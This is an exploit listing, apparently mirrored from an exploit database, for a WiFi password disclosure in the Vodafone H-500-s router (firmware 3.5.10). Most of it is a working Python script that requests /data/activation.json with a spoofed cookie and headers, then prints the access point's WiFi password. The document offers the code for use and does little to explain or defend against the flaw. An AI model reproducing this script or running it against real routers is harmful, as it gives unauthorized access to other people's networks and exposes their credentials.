Exploit for Vodafone H-500-s 3.5.10 WiFi Password Disclosure

## https://sploitus.com/exploit?id=PACKETSTORM:165448
# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure  
# Date: 01/01/2022  
# Exploit Author: Daniel Monzón (stark0de)  
# Vendor Homepage: https://www.vodafone.es/  
# Software Link: N/A  
# Version: Firmware version Vodafone-H-500-s-v3.5.10  
# Hardware model: Sercomm VFH500  
  
# The WiFi access point password gets disclosed just by performing a GET request with certain headers  
  
import requests  
import sys  
import json  
if len(sys.argv) != 2:  
print("Usage: python3 vodafone-pass-disclose.py http://IP")  
sys.exit()  
url = sys.argv[1]+"/data/activation.json"  
cookies = {"pageid": "129"}  
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101  
  
Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-  
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-  
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}  
  
req=requests.get(url, headers=headers, cookies=cookies)  
result=json.loads(req.text)[3].get("wifi_password")  
print("[+] The wifi password is: "+result)